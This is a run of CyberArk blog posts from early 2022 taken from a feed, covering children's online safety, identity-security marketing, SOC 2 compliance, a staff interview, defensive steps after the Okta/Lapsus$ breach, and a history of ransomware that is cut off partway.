“Sometimes I am concerned about my Instagram being hacked, so I change the password very often — around once a month. I am worried about this because I know many people who have had their accounts hacked before.” – Jordan, 15

Have you or someone in your family ever been scammed?

I have been hacked twice. The first time I was hacked was when someone sent me a link and it asked me to put my Instagram username and password in to access the link. Because I was in middle school, I didn’t really think much of it. I ended up being hacked, and my account sent over 100 DMs to people. The second time I got hacked was recently, through my bank account. I’m still not sure how it happened, but someone got access to my online bank account and took the most of my money out. In both of these cases, I changed my passwords to be more complex. Additionally, for the bank situation I spent a lot of time talking to people on the phone, and I had to get a new debit card. I think from these situations I have learned to be extra cautious on the internet and have made sure not to give my passwords to any website that may be untrustworthy.– Maya, 16

Children of all ages want to participate in the digital world. In their own words, the best part of the internet is…

“Minecraft!” – Colton, 9

“How quickly you can obtain information with a quick search, and oftentimes that information can be helpful for a project, directions to a location or just pure curiosity.” – Ben, 13

“That you have access to a variety of things, people and ideas. The internet is such a big place, and it allows you to learn about the people and the world around you.” – Becca, 15

They also understand some of the potential risks, such as: 

“Malware, which is something that can damage your computer.” – Lucas, 10

“The people who try to trick you to receive your information and passwords.” – Jordan, 15

“Cyber bullying.” – Lucy, 11

“The danger of being stalked by someone or having your location tracked or someone stealing your identity.” – Ben, 13

“I think that it is very easy to come across bad people or things on the internet.” – Becca, 15

Home is a great place to start building lifelong cyber safety skills — from keeping devices updated and “clean,” to protecting personal information, to being cautious about sharing information on social media. Yet Google’s survey found that one in four parents has not proactively spoken to their kids about online safety over the past year.

It can be challenging to know where to start but fortunately, there are some great resources available to help get the conversation about online safety going. Here are just a few of our favorites:

A Platform for Good: Teaching Effective Security Habits at Home

Common Sense Media: Cyberbullying Resources for Parents

Family Online Safety Institute: Digital Parenting Resources 

Federal Trade Commission:  OnGuardOnline

Internetmatters.org:  Helping Parents Keep Their Kids Safe Online

National Cybersecurity Alliance:  Stay Safe Online Resource Library

U.S. Department of Justice:  Keeping Children Safe Online

UNICEF: Growing Up in a Connected World

]]>
How Digital Identities Drive Cybersecurity Debt, the Hidden Transformation Trade-Off https://www.cyberark.com/blog/how-digital-identities-drive-cybersecurity-debt-the-hidden-transformation-trade-off/ Tue, 12 Apr 2022 10:00:53 +0000 https://www.cyberark.com/?p=129738 Cybersecurity Debt Digital Identities

Many cybersecurity concepts are complex and often difficult to explain to non-technical audiences. Kerberoasting? Golden SAML? Huh? This can make it challenging for security leaders to communicate urgency and gain stakeholder support for important projects.

Educating business stakeholders and consumers on the importance of securing personal and professional digital identities is precisely why Identity Management Day (#IDMgmtDay2022 ) was established by the Identity Defined Security Alliance (IDSA) and National Cybersecurity Alliance. As you embark in awareness-building initiatives this April 12, consider framing the growing digital identity problem in terms of “debt” — a concept that’s as universally understood as it is dreaded. 

Based on findings from The CyberArk 2022 Identity Security Threat Landscape Report,* which was released today, many organizations are heading deeper into cybersecurity debt by prioritizing digital initiatives, such as accelerating cloud migration, developing new digital services and supporting work from anywhere models, while putting off identity-focused security protections.

Rising Cybersecurity Debt Can Hamstring Innovation and Future Success

Whether it’s splurging on a big vacation, buying a new home or launching a new interactive app for your customers, you take on debt to get something you need (or want) today by deferring “payment” until tomorrow. But, as the saying goes, “Debt is like any other trap: easy enough to get into but hard enough to get out of.”

Cybersecurity debt is a type of technical debt — a term first introduced by computer programmer Ward Cunningham to explain the future cost of reworking a solution that wasn’t completely or properly designed from the start. Cybersecurity debt specifically refers to the unaddressed security vulnerabilities that accumulate in an organization’s IT environment as new systems and technologies are added over time. When cybersecurity debt isn’t paid off promptly (in other words, if security issues aren’t addressed right away), “interest” can quickly build, making it difficult and costly to repair those shortcuts down the road.

Getting bogged down in cybersecurity debt ultimately leaves fewer dedicated resources for sustaining a productive and efficient business.

The Enterprise Digital Transformation Trade-Off

Though volatility remains a top business challenge, standing still is not an option. Nearly every surveyed organization (99%) accelerated a business or IT initiative within the past 12 months in the push for continued resiliency and competitive differentiation.

But transformative projects are rarely achieved without making waves, especially when it comes to large-scale technology initiatives. Each one creates a massive swath of new interconnected digital identities — the virtual ID cards of cyber space — each containing credentials of the human or machine linked to it. These digital identities are used to facilitate interactions and broker access, often to sensitive corporate data and assets required to perform a job or function.

Enterprise Digital Identities at a Glance

A High-Interest Digital Identity Debt Dilemma

It takes just one compromised identity for a threat actor or malicious insider to launch an attack and start escalating privileges to move deeper into an environment in search of valuable assets. This is likely why respondents ranked credential access as their No. 1 area of risk. Yet 79% said their organization hasn’t prioritized the protection of critical data and assets. Instead, they’re moving full steam ahead with initiatives respondents said could introduce significant risk.

This dissonance has created substantial cybersecurity debt that continues to mount as “interest” accumulates in the form of new unmanaged identities across every major IT infrastructure component.

Identity Security controls were largely absent from key IT environments

This Identity Management Day, Create a Feasible Pay-Off Plan to Tackle Cybersecurity Debt

As in our personal lives, a certain level of debt is sometimes necessary. If your car dies and you need one to get to and from work, you may be forced to take out a loan. Likewise, many organizations had no choice but to fast-track projects that could keep operations running amid pandemic-driven challenges, making some security trade-offs along the way.

The key now is to tackle this debt responsibly before balances become too unwieldy, or worse, organizations face “bankruptcy” for failing to evolve at the rate of technology change due to poor security decisions.

To their credit, some respondents have committed to turning things around. Notably, almost all respondents are embracing Zero Trust cybersecurity models of “trust nothing; verify everything,” with half (50%) of them prioritizing Identity Security tool implementation as one of their top three initiatives to pave the way.

And in the face of continued ransomware attacks and other emerging threats, they’re approaching cybersecurity debt and risk reduction efforts more holistically — not only emphasizing important technical controls such as multi-factor authentication (MFA) and least privilege but also people-centric initiatives such as security awareness training to embed security-conscious behavior into their cultures. This defense-in-depth approach reflects a widespread “assume breach” mentality, which 82% of respondents say they’ve embraced.

Digging out of cybersecurity debt takes time and for many organizations, there’s much work to be done. Creating a risk-based plan can help them identify ways to make quick, high-return “payments” and then follow a feasible timeline for reducing the remaining cybersecurity debt. With a solid identity-centric risk plan in place, organizations can effectively strengthen defenses against emerging threats while advancing key initiatives to propel their business forward.

To learn more, download The CyberArk 2022 Identity Security Threat Landscape Report.

*The CyberArk 2022 Identity Security Threat Landscape Report surveyed 1,750 IT security decisions worldwide with organizations of at least 500 employees or more across all private and public sectors.

 

]]>
4 Reasons to “Enroll” at CyberArk University https://www.cyberark.com/blog/4-reasons-to-enroll-at-cyberark-university/ Fri, 08 Apr 2022 13:00:59 +0000 https://www.cyberark.com/?p=129718 CyberArk Training and Certification

CyberArk University is the best place to learn the ins and outs of the CyberArk Identity Security Platform — whether you’re an administrator looking to learn the fundamentals of CyberArk Privileged Access Manager before project kickoff; an implementation expert looking to certify your configuration skills for CyberArk Identity deployments that enable single sign-on (SSO), adaptive multi-factor authentication (MFA) and lifecycle management; or a developer seeking hands-on training in CyberArk Secrets Manager solutions.

For more than seven years, CyberArk University has provided security professionals around the world with the training and skills validation needed to implement and administer CyberArk Identity Security solutions, set teams up for success and help organizations get the most out of their CyberArk investments. Since its inception, more than 100,000 people — from CyberArk customers and partners to CyberArk’s own internal employees — have advanced their cybersecurity skills and knowledge through CyberArk University.

We spoke with Gali Rotem, senior director for global education services at CyberArk, about CyberArk University’s ever-expanding training offerings, exciting new community contributions and four groups that can benefit from this world-class training and certification program.

1. Organizations: Offer compelling training opportunities to help attract and retain cybersecurity talent — and set teams up for success.

According to a newly released ISACA 2022 State of the Cybersecurity Workforce study, 63% of enterprise organizations have unfilled cybersecurity positions today. Competition for skilled workers is fierce, with 60% of organizations reporting retention challenges. More than ever, training, development and upward growth opportunities are critically important to retaining cybersecurity talent. Without them, nearly half (47%) of workers say they would leave a position.

Courses offered through CyberArk University can help supplement internal training programs by teaching security team members valuable skills and best practices for operating CyberArk Identity Security solutions. By deepening their knowledge and technical abilities around this critical layer of security, team members can advance their professional development and validate their expertise — driving increased job satisfaction and retention.

“Customers and partners appreciate the value they get from our classes in supporting their learning journey. We get lots of great feedback, especially for our labs,” says Rotem.

Here’s what some CyberArk University participants had to say:

 

CyberArk University Testimonials

 

2. Security practitioners: Grow professionally and stand out in the market for your Identity Security technical expertise. 

Technical security controls experience is one of the top three skills gaps seen in today’s cybersecurity professionals, according to ISACA survey respondents. Training and certification courses offered through CyberArk University’s Public Certification Program can help security practitioners deepen and validate their technical expertise across CyberArk solution areas including Privilege, Access and DevSecOps, and stand out in the market. New courses are added frequently based on community input and interest.

“As the cybersecurity talent shortage continues to impact so many organizations, we’re seeing significant interest in REST API and other automation-focused topics to help teams eliminate manual tasks and amplify their impact,” notes Rotem. CyberArk University offers courses for various skill levels, most of them with customized hands-on labs, that can support career growth within the Identity Security space. Students can use the time spent on these courses for Continuing Professional Education (CPE) credits to maintain other certifications in the field.

Similarly, CyberArk University’s certification exams are designed for various roles and experience levels to help validate CyberArk solution expertise and open doors for additional professional opportunities. Rotem and team are particularly excited about the recent introduction of community-developed exams. “To help ensure certification exams remain up to date and relevant, we work closely with security leaders using CyberArk solutions in their organizations to optimize the exam blueprint and individual questions,” she says.

With flexible learning options available in multiple languages such as German and French — including live classes, on-demand virtual instruction and even a lab environment for hands-on learning — participants can work at their own pace and to the level that best aligns with their job responsibilities and career ambitions.

3. CyberArk consultants and partners: Help customers address their most critical Identity Security challenges and build a competitive edge.

Cybersecurity consultants can take advantage of CyberArk University certifications to validate their competency and advanced skills. Achieving the top certification, CyberArk Guardian, demonstrates their ability to design and execute a multi-phase Identity Security program utilizing CyberArk best practices. As part of this experience, security consultants can further cultivate the soft skills needed to effectively communicate Identity Security concepts to a range of technical and non-technical stakeholders, including those at the executive level — today’s No. 1 skills gap, as identified by ISACA survey participants.

CyberArk partner organizations also rely on the training and resources offered by CyberArk University for optimizing their service delivery practices. “Our CyberArk Partner Certification Program is one of the ways we demonstrate our commitment to enabling and supporting our partners around the world,” says Rotem. Partners who have participated in CyberArk University certification courses and exams and have built extensive expertise in CyberArk solutions can take advantage of differentiated benefits and increased revenue opportunities.

4. Anyone: Access our ever-expanding library of free Identity Security resources and training videos

As digital technology continues to evolve rapidly, many organizations have embraced just-in-time training models for their technical workers. Having access to relevant documents and videos to answer questions on the job, exactly when they’re needed, can help workers save time, remove friction, bridge skills gaps and develop proficiency over time.

“There’s a widely held theory that those learners remember 80% of what they watch but just 20% of what they read,” says Rotem. “Our growing library of short, two-minute self-service videos give learners the resources they need to perform job-related activities safely and confidently.”

If you’re searching for quick, just-in-time Identity Security tips, Rotem recommends visiting the CyberArk University YouTube channel. You’ll find instructional how-to videos on everything from setting up a security key for MFA to adding a new user to CyberArk Cloud Entitlements Manager.

And whether you’re an IT admin eager to hit the ground running, a developer seeking to automate tasks or an end user getting familiar with the benefits of CyberArk solutions, you can swing by CyberArk University or the CyberArk Technical Community to find answers to your Identity Security questions. In the CyberArk Technical community, customers and partners can ask questions, join discussions, browse by product, find best practice recommendations by functional role and get step-by-step guidance on everything from starting a deployment to upgrading components.

Advancing Skills and Knowledge to Close the Cybersecurity Skills Gap

A strong emphasis on technical training and professional development is critical to closing the global cybersecurity skills gap while helping security workers stay engaged and be the best versions of themselves. “Our team is proud to contribute to this effort through CyberArk University and the Technical Community, empowering customers, partners, employees and community members with meaningful learning opportunities,” concludes Rotem.

]]>
Why SOC 2 Compliance Is a Matter of (Zero) Trust https://www.cyberark.com/blog/why-soc-2-compliance-is-a-matter-of-zero-trust/ Thu, 07 Apr 2022 11:57:37 +0000 https://www.cyberark.com/?p=129705 Why SOC 2 Compliance Is a Matter of (Zero) Trust

SaaS solutions are now so entwined in business users’ daily routines that they seem to meld into one experience — or simply put, “the way I work.” Yet the reality is there are many disparate cloud applications in play across a typical enterprise — 364 on average – which means a lot of complexity and risk. That’s why, as organizations expand and accelerate business in the cloud, they’re not just looking at how SaaS solutions can enable them; they’re increasingly focused on potential security impact. And it’s become clear that unprotected or misconfigured data in the hands of an application provider — one link in the interconnected software supply chain — is all it takes to open the door to cyber attacks.

Enter SOC 2. It’s an industry certification that gives SaaS solution providers a verifiable way to demonstrate the security and reliability of their software products, services and practices. Though it’s not mandatory for SaaS providers to be certified, many enterprise customers have added SOC 2 compliance to their must-have list when evaluating potential vendors. If this is the case for your organization, especially if you are one of the many embracing SaaS-delivered security solutions to protect corporate assets and distributed workforces, such accreditations are crucial.

Mapping SOC 2’s Five Principles to Zero Trust

As defined by the American Institute of Certified Public Accountants (AICPA), SOC 2 is a framework used by service providers to audit and report how they manage sensitive customer data. The SOC 2 report focuses on internal controls across five “trust service principles.” Since service providers’ offerings vary, organizations are not required to certify all five areas, considering they may not all be relevant. The security principle is mandatory for a SOC 2 audit — the others are optional. However, some customers may require all five areas to be certified before entering a business relationship.

Here’s a look at how SOC 2’s various technical controls work in support of a broader Zero Trust approach to cybersecurity that encompasses people, processes and technology.

Principle 1: Security

In a Zero Trust model, every identity — human or machine — must be authenticated and authorized with zero exceptions. The SOC 2 security principle evaluates application security design (for both off-the-shelf and custom applications) and specifically, how access to sensitive information — such as personally identifiable information (PII), financial data and intellectual property — is controlled and protected. SOC 2 looks for foundational access controls such as multi-factor authentication (MFA) and intrusion detection, which work together to let users in and keep threats out.

Principle 2: Availability

Customers expect their cloud services to be on and ready to use — any time, every time. This principle evaluates the provider’s ability to keep things up and running by examining performance monitoring capabilities, along with processes in place to respond to security-related incidents, among others. Zero Trust security calls for comprehensive monitoring capabilities so organizations have the complete situational awareness they need to identify threats quickly and respond swiftly and with confidence to minimize exposure.

Principle 3: Processing Integrity

This principle focuses on how data is processed. With the requisite quality assurance and process monitoring controls in place, application providers can verify that their data storage, delivery, modification and retention processes adhere to stringent security standards to protect customer data. Implementing controls to help ensure customer data is protected requires organizational preparedness. Preparedness is a core premise of Zero Trust: it’s no longer realistic for any organization to think they can stop every attack, every time. Instead, it’s about how they’re prepared to identify and respond to threats before they can gain enough escalated privileges to do harm. When organizations have documented plans, metrics and security processes in place to protect customer data, they make further progress towards adopting — and evolving — a Zero Trust security model.

Principle 4: Confidentiality

Confidentiality is critical — and even more so in the case of multi-tenant SaaS applications. Organizations need assurance that the environment housing their confidential data is secure from unintended access from both the service provider and third-party tenants. SOC 2 requires access controls — along with data encryption and firewalls — to help protect data from falling into the wrong hands. Foundational to a Zero Trust approach, Identity Security solutions provide a holistic approach by securing individual identities throughout the cycle of accessing critical assets. This means authenticating that identity accurately, authorizing that identity with the proper permissions and providing privileged access for that identity to access sensitive assets in a structured manner — all in a way that can be audited (or accounted for) to ensure the entire process is sound.

Principle 5: Privacy

The SOC 2 privacy principle evaluates how the application processes PII based on the company’s specified data policies, as well as the AICPA’s Generally Accepted Privacy Principles (GAPP). The U.S. Department of Homeland Security defines PII as “any information that permits the identity of an individual to be directly or indirectly inferred, including any information that is linked or linkable to that individual.” Similarly, the confidentiality principle, proper access controls must be in place to protect PII data from unauthorized access. This means verifying every user, validating every device and intelligently limiting privileged access based on least privilege and Zero Trust policies.

Demonstrating our Cybersecurity Commitment with SOC 2 Compliance

At CyberArk, Zero Trust isn’t a buzzword, it’s a philosophy that’s deeply embodied in each of our solutions and services, as well as our own personnel, software and infrastructure security practices.

Today, we’re the only Identity Security provider offering SOC 2 Type 2-certified SaaS solutions for Privileged Access Management (PAM), endpoint privilege management, remote vendor access, Identity and Access Management, and cloud infrastructure entitlements management.

Our SOC 2 accreditation is just one of many ways we demonstrate our commitment to our customers who depend on CyberArk to improve the security of their IT environments and software supply chains. To learn more about our company’s security, reliability, privacy and compliance policies, please visit the CyberArk Trust Center.

]]>
Identity Security Tips to Protect Your Turf https://www.cyberark.com/blog/identity-security-tips-to-protect-your-turf/ Thu, 31 Mar 2022 13:00:34 +0000 https://www.cyberark.com/?p=129531 Identity Security and Lawncare

You spent the entire afternoon manicuring your front lawn. But within an hour three kids, your neighbor and the DoorDash guy all trampled over it to get to your door. That’s despite the KEEP OFF sign in the middle of the lawn. So next time, you post two signs … then three … then four … Same result.

Enterprise IT security teams can experience similar frustration when working to manage identities and protect privileged access across their ever-expanding, hybrid IT estates.

Logical and physical barriers simply can’t keep cyber attackers from entering the network. Warning signs haven’t stopped workers who just want to: Get. Things. Done. To revisit our lawn metaphor, menacing signs haven’t kept visitors off your grass. So, what can you do? Stop with the signs and get proactive and comprehensive about your lawncare — and Identity Security — regimen.

Rethink who and what needs to come and go. You want honeybees to meander through your prized rose bushes. Bunnies are welcome to hop by anytime, so long as they keep out of the garden. But groundhogs? Nope. The problem is these creatures can’t read your signs.

The concept of “identity” has evolved. It used to be easy to pinpoint a group of IT administrators who needed privileged access. Once upon a time, these users worked in dedicated office locations protected by physical walls and firewalls. But nowadays, many non-IT users have direct access to sensitive data and systems, often through web applications, which they access from numerous devices and locations. “Identity” also encompasses the illogical: it’s not just about protecting human access. In zero-perimeter environments, machine identities need to be protected; applications must be authenticated; and DevOps secrets must be managed securely. In this landscape, any identity — human or machine — can become privileged under certain circumstances.

These considerations necessitate more granular defense-in-depth control over individual identities. An essential first step is to unify strong authentication mechanisms — such as adaptive single-sign on (SSO) and multi-factor authentication (MFA) — with Privileged Access Management (PAM) to consistently enforce least privilege security controls across all identities, devices and IT assets.

Remember your “rules” sometimes change. Your neighbors’ dog is a hole-digging menace and generally blocked from your yard. But his owners are great friends who often stop over, sometimes bringing their pooch over to play with yours. So, whether you like it or not, the neighboring dog’s “access permissions” to your yard sometimes change.

IT security processes should be just as dynamic as the IT processes they aim to protect. For instance, just-in-time (JIT) access provisioning makes it possible to grant an identity elevated access to only the right resource, at only the right time — making it a cornerstone of Zero Trust access initiatives. JIT access can be particularly useful in cloud and hybrid environments: by utilizing attribute-based access control (ABAC) policies from public cloud providers, JIT capabilities can intelligently provision access only to infrastructure assigned with a specific tag.

Solutions that provide granular Identity Security controls for all forms of access — shared and federated, standing and just in time — can help drive operational efficiencies for security programs. When coupled with behavior-based analytics, they can help eliminate unnecessary authentication steps to optimize user experiences for all human identities — internal employees and external third parties.

Anticipate areas of high foot traffic in your yard. Spend the bulk of your time and Home Depot budget strengthening the grass in these sections to make it more resilient.

A prime cybersecurity example: attackers seek out privileged users, not just IT administrators but also developers and other business users with high levels of access, as the path of least resistance. It’s important to first identify the internal and external parties that directly touch valuable company systems and data. Then focus on strengthening protections around these privileged users with risk-based credential management and session management controls, targeted cybersecurity training and other Privileged Access Management considerations.

Strengthen your lawn from the soil up by fertilizing, reducing thatch and mowing high.

Maintaining a healthy root system is a lot like securing an IT environment. At enterprise scale, Identity Security must be defense-in-depth. There are fundamental cybersecurity practices you just can’t skip over, like locking down endpoints — from employee workstations to servers — by removing local admin rights or adding credential theft VM protection and application control policies to block attackers from reaching their goals.

Reassess your landscape continuously. Maybe your fence and garden net system worked well last year, but this spring, the skunks have found new ways in and are digging holes everywhere in search of tasty grubs.

The security controls you rolled out three years ago may not be suited to handle your hybrid IT landscape today. Build in processes that allow you to constantly reassess Identity Security policies and considerations for all identities — from new employees to inactive third-party vendors — across on-premises systems, SaaS and public cloud environments.  Otherwise, you may quickly find more intruders digging around.

Take back your weekends. You want a pristine, healthy lawn. But you don’t want to spend your free time pushing a mower and keeping watch from your porch. Find ways to make life easier by automating the hard work: point a camera over your flowerbed, put in an irrigation system —you’ll save time and resources in the long run.

Comprehensive security doesn’t have to mean more work. Look for every opportunity to automate manual, time-intensive security tasks. Similarly, bring threat detection capabilities into the fold that can automatically alert on risky behavior such as an anomalous login attempt, the entry of a sensitive command in a privileged session or the creation of a new cloud IAM account with administrative privileges. These processes can help keep your Identity Security program and team focused and effective.

In a changing landscape, avoid “security theater.” Putting up more signs in your yard won’t change behavior — just as securing identities and managing privileged access can’t be reactive or piecemeal. It must be approached as a holistic effort with a consistent philosophy that encompasses all identities, from the endpoint to the cloud, throughout their lifecycle. Otherwise, you may as well shout “Get off my lawn!” at your computer screen.

]]>
Women in Identity Security Spotlight: Erica Smith, CyberArk SVP of IR and ESG https://www.cyberark.com/blog/women-in-identity-security/ Tue, 29 Mar 2022 13:00:45 +0000 https://www.cyberark.com/?p=129382 Women in Identity Security Erica Smith

March is Women’s History Month, a celebration of women’s past and present contributions to society, business and culture, and a fitting time to recognize one of CyberArk’s own intrepid Women in Identity Security.

CyberArk Senior Vice President of Investor Relations and Environmental, Social and Governance (ESG) Erica Smith joined CyberArk in 2015 on the heels of its IPO to build an advanced investor relations program as company growth accelerated. Up for the challenge, she dove in head-first, raising awareness of security’s role in shaping the business landscape, cultivating strong shareholder relationships and cementing the program’s position as a strategic enabler. Smith’s leadership role recently expanded to encompass ESG — formalizing principles that have always been part of CyberArk’s operating rhythm and reflect CyberArk’s mission. Focused on defining the program and charting new ground, it’s an exciting and busy time for Smith, but she takes it all in stride, noting that humor, positivity and perspective are key to staying balanced.

We asked Smith about her professional journey, influential female mentors along the way and how more diversity can help strengthen the cybersecurity industry at large. Here’s what she had to say:

Tell us how you got into the cybersecurity field and what’s been most important to you as you’ve progressed along your career path?

“I have a finance background and moved into investor relations early in my career where I worked at several enterprise technology companies. I wish I could say my entry into cybersecurity was deliberate, but my career choices — including joining CyberArk — have always been centered on people. I ask myself a few key questions when considering a position: ‘Do I want to spend the majority of my time with this team? Do we share similar values, particularly as it relates to transparency, integrity, long-term relationships and the pursuit of diverse perspectives? Lastly, and importantly, will I learn and be challenged?’”

What’s the best professional advice you’ve ever received?

“To step out of my comfort zone. Working in both investment and cybersecurity sectors, I’ve often been the only woman in the room. It’s not in my nature to dominate a discussion but early in my career, a mentor encouraged me to push past this and speak up with confidence. I’ve learned to do this while also embracing more innate strengths of intuition, flexibility, mindfulness and empathy to develop and grow professionally. Everyone has a unique approach, don’t fight it — be you!”

Speaking of mentors, can you talk about the women who have influenced your career?

“I’ve had incredible woman role models over the course of my career, including at CyberArk. My strongest role models are those who have elevated and supported others by truly working as a team. They’ve taught me that fostering loyalty and trust pays tremendous dividends — and they’ve exemplified how this can be achieved in functional groups and across organizations.”

“If your manager, colleague or teammate is truly supportive, you feel empowered to take calculated risks and mistakes become okay. I’ve learned that failing fast doesn’t mean failure: it just means you need to try a new road. When there is a deep-rooted belief that everyone is “in it together,” people feel more connected — to the mission, to the outcomes and to one another. I’ve seen this firsthand and try to bring a ‘win together, lose together’ mindset to work with me every day.”

This Women’s History Month focuses on ways to #BreakTheBias to create a more diverse, equitable and inclusive world. Can you describe how greater diversity is integral in strengthening and accelerating the cybersecurity industry?

“The data supports a strong link between diversity and enhanced company performance in both profitability and growth. It’s easy to see why: diversity brings more perspectives, experiences and creativity to the table to solve big problems and drive innovation forward. More important, diverse representation helps to create an inclusive, safe place to collaborate, share ideas and challenge thinking, helping us all grow as individuals and practitioners. By cultivating a strong sense of belonging and providing more of these growth opportunities, the cybersecurity industry can attract and retain more talent and progress more quickly.”

In closing, can you share a personal mantra that motivates and inspires you to be your best self?

“Play the long game. With integrity as the north star, do the right thing for the long run, steering clear of distraction and keeping the long-term impact in focus. This cuts across all spectrums of work and life, and ultimately comes down to trust — the foundation upon which cybersecurity, investor relations, ESG and everything else is built.”   

Editor’s note: At CyberArk, Diversity, Equity and Inclusion (DE&I) is a top corporate initiative and a major focus along our ESG journey. To learn more about ways we’re evolving our recruiting efforts, our educational and awareness programs and our support networks for underrepresented groups, read our latest ESG Report.

 

]]>
CyberArk’s Perspective on the January 2022 Okta Compromise https://www.cyberark.com/blog/cyberarks-perspective-on-the-january-2022-okta-compromise/ Thu, 24 Mar 2022 22:17:17 +0000 https://www.cyberark.com/?p=129329 CyberArk Perspectives on Okta Breach

Okta, a major Identity and Access Management vendor, has confirmed it was compromised in a targeted cyber attack in January 2022 by way of a third-party support engineer’s machine. This confirmation came on March 22 after the criminal group Lapsus$ shared screenshots online. This follows other high-profile incidents involving the same threat actor.

This incident serves as a sobering reminder that without exception, we are all a target — and there are no silver bullets. No one company, solution or technology can singlehandedly prevent relentless attacker innovation. As cyber defenders, we must communicate openly and quickly when things go wrong, remember that security is a “team sport,” and then forge ahead together with a shared mission and security-first mindset.

The following post outlines what is known about this incident to date, along with some practical steps to take if your Identity Provider (IdP) — no matter which one you use — is compromised.

A Brief Recap of the Okta Breach

In January 2022, threat actors compromised the endpoint of an Okta third-party support engineer and gained access to Okta customers’ data. The matter was discovered quickly but wasn’t made public until Lapsus$ posted screenshots online on March 22, 2022. Okta then confirmed the breach. This may have implications for customers using Okta for Single Sign-On and as an Identity Provider.

The Lapsus$ criminal group has risen quickly in notoriety due to its high-profile targets and unconventional approach. While underlying motivations and the full extent of damages are not yet understood, two things are clear: identity compromise played a key role in these incidents and the major technology companies involved were not the only intended targets. In the case of Okta, Lapsus$ specifically communicated they were actually targeting Okta’s customers.

4 Immediate Steps to Take if You Know or Suspect That Your Identity Provider Is Compromised

As malicious cyber activity increases, there’s an urgent need for every organization to proactively assume breach, harden systems and prepare for potential attacks — whether they target your organization directly or initially impact a third-party provider.

Identity Providers should be considered Tier 0 assets and be protected as such. If your organization’s Identity Provider is compromised or if you suspect it has been compromised, here are four steps that should be taken immediately to minimize exposure and impact.

Step 1: Scrutinize configuration changes made since the reported attack date. A simple configuration change is all it takes to switch up an entire authentication flow and give attackers persistent access. Be on the lookout for these specific indicators of compromise:

  • Any new MFA device deployments or device changes
  • MFA configuration changes: For instance, by compromising identities and user passwords to disable MFA to certain apps, threat actors could gain full access to these applications while circumventing MFA.
  • Identity Provider (IdP) configuration changes: If the URI (the connection between an SSO solution and IdP) and related configurations are changed, threat actors could gain persistent access to applications and services even if users’ passwords are changed.
  • Password and MFA reset attempts, particularly for privileged and administrative accounts. Assume all password reset attempts — successful or not — are under suspicion and reset all the passwords.
  • Permission and role changes and the creation of new users. If your IdP solution offers a risk-based access and risk-scoring mechanism based on anomalous access, evaluate all high-risk events and high-risk users in the system. These events may be a consequence of anomalous access by IP, location, device or impossible travel, to name a few examples. It’s also important to look for these changes in the target applications themselves; it can be more difficult to detect shadow admins created in these applications that enable direct login into those target apps. If your organization uses an Identity Governance and Administration (IGA) platform, this is a good time to perform an attestation exercise with it.

Step 2: Look for any unrecognized or malicious applications. If threat actors have access to the SSO platform, they could add a malicious app or replace an existing one, disguised as a legitimate application.  If a new application is added, there should be a governance process such as an approval process or notifications to multiple administrators enabled. Malicious apps can abuse the delegated permissions assigned to them after getting user consent. For example, a malicious application may request access to read email on Outlook or access to cloud-based storage.

Step 3: Implement least privilege to minimize potential damage and access that threat actors could gain by obtaining access tokens to different apps and services. Consider implementing just-in-time access and dynamic elevation capabilities to eliminate standing access and review least privilege fundamentals such as removing local admins from endpoints. This also means implementing MFA policies that comply with the highest level of Authenticator Assurance Levels (AAL3) for access to critical apps.

Step 4: Restrict access to sensitive applications from specific and managed devices to help limit access to these applications, including adding multi-access conditions on top of MFA such as IP and device health conditions as two examples. Least privilege management practices such as restricting RDP and remote access only to the Helpdesk, Privileged Access Management solution (PAM), Vendor Privileged Access and management subnets should also be followed.

The Security-First Path Forward

Today’s threat landscape demands a security-first mindset and an all-hands-on-deck effort. We stand ready alongside our security partners and peers, united in our mission to protect and defend what matters most.

We will continue to monitor this evolving situation and provide updates as additional information becomes available. For more details, join our webinar on April 6.

To learn how we are continuously enhancing our own cybersecurity posture, visit the CyberArk Trust Center.

]]>
Ransomware Rewind: From Floppy Disks to Ransomcloud Attacks https://www.cyberark.com/blog/ransomware-rewind-from-floppy-disks-to-ransomcloud-attacks/ Fri, 18 Mar 2022 13:00:10 +0000 https://www.cyberark.com/?p=128999 Ransomware Rewind: From Floppy Disks to Ransomcloud Attacks

From plug-and-play ransomware-as-a-service offerings to highly skilled operator-based attacks, ransomware is proof that cyber attackers are constantly innovating to achieve their goals. Long before global supply chain infections made front-page news, ransomware crept into computers through malicious floppy disks, bewildering users and padding a Panama-based P.O. box with extortion payments. Let’s rewind back three decades to see how far ransomware has come — and what it will take to stay ahead of continued attacker innovation.

The Early Days of Ransomware

The year was 1989. Twenty thousand floppy disks were distributed to researchers across 90 countries, purportedly containing a questionnaire that could help determine patients’ risk of contracting AIDS. But the disks contained a virus of their own. File names were encrypted on infected computers, and users were instructed to send payment via cashier’s check or international money order to re-gain access to their digital content. This relatively basic encryption virus, dubbed the AIDS Trojan, or PC Cyborg Trojan, is widely considered to be one of the first ransomware attacks in history.

Yet the word “ransomware” didn’t really take hold for another 20+ years. Before it did, Bitcoin entered the picture in 2009, offering people a simpler, speedier way to buy, sell and exchange things directly. By eliminating intermediaries like banks and governments, Bitcoin and other cryptocurrency methods also gave criminals an anonymous way to extort ransoms from individuals and corporations without getting caught. They quickly took advantage of the opportunity.

By 2013, a ransomware strain called CryptoLocker spread rapidly across more than 250,000 computer systems via malicious email attachments. It introduced stronger encryption methods, demanded crypto payments in exchange for a decryption key and threatened to delete the key if payments weren’t made by a set deadline. The following year, law enforcement took down the ransomware’s primary propagation mechanism, the Gameover Zeus Botnet, but not before the attackers took off with millions of dollars. Eager to cash in, copycat criminals began launching their own ransomware trojan attacks using CryptoLocker as a model.

Ransomware Goes Mainstream in the Opportunism Era

In 2015, the FBI received 2,453 ransomware-related complaints totaling more than $24 million in damages — and those were just the reported U.S. cases. By the time Locky ransomware — capable of attacking 50,000 systems in a single day — and the advanced encryption strain Petya emerged in 2016, security teams were on high alert. The emergence of plug-and-play ransomware-as-a-service kits that year removed many barriers to entry, ushering in a new wave of opportunistic attacks at the hands of novice attackers.

These financially motivated threat actors relied heavily on “spray and pray” tactics such as phishing, social engineering and exploit kits to target as many organizations and systems as possible. The 2017 WannaCry outbreak exemplified this opportunistic attack style. Unlike previous strains of ransomware, WannaCry could self-replicate and spread using the “eternalblue” SMB vulnerability in Microsoft systems. Anti-virus systems and patching alone couldn’t stop the ransomware from impacting more than 10,000 organizations and 200,000 individuals in over 150 countries. The attacks also highlighted an urgent need for more holistic endpoint protection mechanisms to help block credential theft attempts and prevent data encryption and loss.

